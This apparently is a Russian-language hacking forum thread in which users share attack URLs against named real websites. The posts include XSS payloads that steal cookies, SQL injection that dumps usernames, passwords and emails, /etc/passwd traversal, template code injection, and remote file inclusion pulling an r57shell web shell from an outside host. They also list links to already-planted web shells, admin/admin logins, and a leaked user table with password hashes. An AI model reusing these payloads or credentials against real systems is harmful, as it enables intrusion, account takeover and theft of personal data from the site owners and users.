|
http://www.bstu.by/test_results.php?test_id=1&pass_ser=<h1>xss1</h1>&pass_num=<h1>xss2</h1>&subject_id=0
|
|
Rupay.ru
https://rupay.com/status.php?st_id="><script>alert('found_by_gLAnce' )</script> |
http://_geograd.ru/index.php?page=...../etc/passwd%00
__http://www.philos.msu.ru/library.php?sid=11' ЗЫ В МГУ сервер на винде) |
_http://www.style2ouf.com/us/News/affiche_news.php?id_news=527'
_http://www.style2ouf.com/us/News/result.php?genre=1&nom=20-5-2006' |
_http://www.rolemancer.ru/article.php?sid=-1+union+select+1,2,3,uname,pass,email,7,8,9,10,use r_icq+from+users+limit+2,1/*
|
http://rtf-club.ru/forum/misc.php?do=page&template={${include(%27http://dia.forever.kz%27)}}
|
Еще одна пассивная никому не нужная ксс http://www.hansaworld.com/WebHBSDivMain.hal?langcode=ru%22%3E%3Cscript%3Eale rt(/hui/)%3C/script%3E&WEBPAGE=
|
http://www.myim.ru/index.php?m=<h1>xss
|
http://www.nazarov-av.ru/admin/
l/p: admin/admin |
|
Цитата:
# INSERT INTO LCMS_USERS VALUES ('root', '3692a3997fc0a011762f2d9feed9d268', 2, '0', '6d394f489c392c9d91913fb9c0ea7336', 1105535093, 1); INSERT INTO LCMS_USERS VALUES ('mxms', '3692a3997fc0a011762f2d9feed9d268', 2, '0', 'a77bf438f56b5ca6962c0ffd1dfbf14d', 1104407014, 1); INSERT INTO LCMS_USERS VALUES ('larry-admin', 'cddf1c37e2d4c2cc51a9f0b194150175', 2, '0', NULL, 0, 1); INSERT INTO LCMS_USERS VALUES ('rooter', '9220e3b9047f78cd7615931ab76cba10', 16, '0', '996c5d54d3139b7a3702b2ff5ae445c0', 1102425199, 1); INSERT INTO LCMS_USERS VALUES ('test', '098f6bcd4621d373cade4e832627b4f6', 16, '0', '6b5c80c4ef8f583b73bd2bac73d14e28', 1102425450, 1); INSERT INTO LCMS_USERS VALUES ('relict', '5a315f8ec5a19d1b6bdd905d2cd0e7a1', 16, '0', '45c588311a91fed253abbea751b48539', 1102426254, 1); INSERT INTO LCMS_USERS VALUES ('teste', '698dc19d489c4e4db73e28a713eab07b', 16, '0', 'a7be86787110f400c91f64c2aed356ac', 1103703057, 1); INSERT INTO LCMS_USERS VALUES ('zero', 'd02c4c4cde7ae76252540d116a40f23a', 16, '0', NULL, 0, 1); |
__http://www.nuke-tops.ru/index.php?module=gallery&file=disp_serie&id_album= 9 OR 10
|
hntp://www.hackers.nl/artikelwip.php...E%3C/SCRIPT%3E
Полный дебилизм на сайтах, провайдеров в этой зоне имеет место быть. |
_http://vbulletin.net.ru/index.php/"><script>alert(document.cookie)</script>
выкладываю заволявшийся приват :) |
sql OLE BD _http://www.acusis.com/SearchFiles.asp?search='&mode=anywords
_http://terrier.ru/produkt.php?t=sub_pages&cat=3' _http://vzxk.ru/index.php?url=http://gbl.nightmail.ru/rst.php забавно Disable functions : dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit. VectorG у тебя где то видел похожую шляпу, что нибудь сделал с этим? |
Может и все знают, на когда я увил мне стало интересно- это глюк или просто ошибка, или так задумано.
Когда проводится регистрация нового пользователя на forum.antichat.ru, после регистрации, если не сделать активацию пользователя можно просмотреть скрытый раздела форума Public exploits, после активации раздел не виден. |
И на последок:
_hxxp://www.kopalin.com/remview.php _hxxp://www.bitacs.ru/.system/extensions/librarys/nc.php _hxxp://nhackhuctinhyeu.5gigs.com/tr.php _hxxp://www.netsell.kz/forums/misc.php?do=page&template={${phpinfo()}} _hxxp://johnny.ihackstuff.com/index.php?module=prodreviews p.s А самое обино, скоро лето а меня колбасит(ангина замучила!) |
http://www.steven-gerrard.net/index02.htm во y@ раньше такого небыло!
|
_http://keep4u.ru/album.php?view=%27
|
_http://retvshowcase.com/fileupload/store/re.php
|
_http://baby.chg.ru/cgi-bin/articledb/article.cgi
В строке поиска: <script>alert('tested_by_Sa-D_007');</script> |
_http://narod.yandex.ru/filemanager/rename.xhtml?f="><script>alert(document.cookie)</script>
_http://www.baset.cz/index.php?p_stranka=vypis.php&p_od=1& Цитата:
я админам vbulletin.net.ru ещё около недели назад сказал о баге, так они слюни как бабы распустили и забанили, вообще теперь х*й кому из админов говорить буду... |
_http://3sute.trei.ro/upload/re.php
|
_http://hossam.glwb.info/linkman101/index.php
pass: admin |
_http://greenhodge.net/g/404_error.php
http://_http://ukrlit.clawz.com/text.../../etc/passwd http://_http://www.geocode.com/modul...c/passwd&pre=y _http://buddhafiguren.de/etc/ _http://www.igromania.ru/games/?666'567 _http://www.ext.ru/?id=7"><script>alert()</script> http://_http://www.newstrack.ru/news...ew/20050414/a/ _http://www.mobiteka.ru/melodies/melodies.shtml?artid=27' _http://referat.na5.ru/load.php?id=504948' _http://referat.apple-online.ru/index.php?type=diplom_1&id=3478' _http://www.3a.kiev.ua/good.php?name=<script>alert()</script> _http://catalog.begun.ru/?q="><script>alert()</script> _http://7000.ru/computers/details.php?id=2' _http://sofit.com.ua/rus/asearch/0/1/0/?ser_mid=-1&go_search=1&q_search="><script>alert()</script> Вроде нормально надо еще будет просите! |
_http://www.evrey.com/sitep/list/index.php3?menu=http://rst.void.ru/download/r57shell.txt?
|
_http://www.surnameroundup.com/paxguestbook/templates/url.php
|
_http://50mb.glwb.info/store/re.php
|
_http://www.paladins.ru/znaxar.php?free="><script>alert(1)</script>&sila1=3"><script>alert(2)</script>&lovk1=3"><script>alert(3)</script>&intuiz1=3"><script>alert(4)</script>&vinos1=12"><script>alert(5)</script>&intel1="><script>alert(6)</script>&mudr1="><script>alert(7)</script>&sila2="><script>alert(8)</script>&lovk2="><script>alert(9)</script>&intuiz2="><script>alert(10)</script>&vinos2="><script>alert(11)</script>&intel2="><script>alert(12)</script>&mudr2="><script>alert(13)</script>&flag=2"><script>alert(14)</script>
_http://horoscopes.rambler.ru/day.html?day=1<script>alert(1)</script>&month=4&year=1965<script>alert(2)</script> _http://blog.msk.ru/login.php?login=<script>alert()</script>&pass=&subm it=OK |
_http://www.film.ru/search.asp?what="style=background:url(javascript:a lert());"&a
mp;where=root&mode=medium _http://smchat.ru/?s=reguser&login="><script>alert()</script> _http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script> _http://encycl.accoona.ru/?word=<script>alert()</script> _http://hw.ru/hi-tech/Login.jsp?login='"><script>alert(1)</script>&password='"><script>alert(2)</script> _http://www.srb.ru/search-results/?q="><script>alert()</script>&m=all&wm=wrd&ps=10&page=0 _http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query="><script>alert(1)</script>&index-grp=Public__FULL&index-type=t&type-index="><script>alert(2)</script> |
XSS
_http://www.z-team.net.ru/?id=utilit_whois в поиске доменов _http://mirsofta.ru/ в поиске |
_http://humanoid.ru/chat/install.php
|
_hxxp://chinaeveryday.ru/RU/
|
XSS:
_http://hp.qsrch.com/apps/eps/eps.cgi?prt=hp03&uuid=67b0795864c9d6f84de322f426cc 8788&s=%3Cscript%3Ealert%28%27JS%27%29%3C%2Fscript %3E&submit=Go _http://hp.qsrch.com/apps/eps/eps.cgi?Keywords=%3Cscript%3Ealert%28%27JS%27%29%3 C%2Fscript%3E&loc=ST&upartner=hp03&ps=H3OTUSER |
_http://www.pentagon.gov/srch/search?template=/search/results-template-dl.html&c=A3B245203F9EBEC5FC8C306E4AAF152F&c=82683 33F54379065&c=6FDF5BD0BF338D19&c=1DA2190B5E9F39D2& q=666&submit=Search&sort=-pub_date'
Пентагон _http://sources.ru/cgi-bin/sources/search/search.cgi?stpos=0&query=<script>alert()</script>&stype=AND _http://www.tug.org/PSTricks/main.cgi?search=<script>alert()</script>&search=Search |
Сайт qmp3, xss:
_http://www.qmp3.ru/search.php?string=%3Cimage+style%3Dbackground%3Aur l%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E&st=al l |
Сайт про рыжих... ;)
http://redpeople.org/plug.php?e=gal&pic=136%27 |
_http://www.crpg.ru/sections.php?op=listarticles&secid=375(
_http://www.crpg.ru/sections.php?op=viewarticle&artid=1539( |
XSS на xss.ru
Код:
GET http://ip.xss.ru/header.php HTTP/1.1 |
| Время: 00:24 |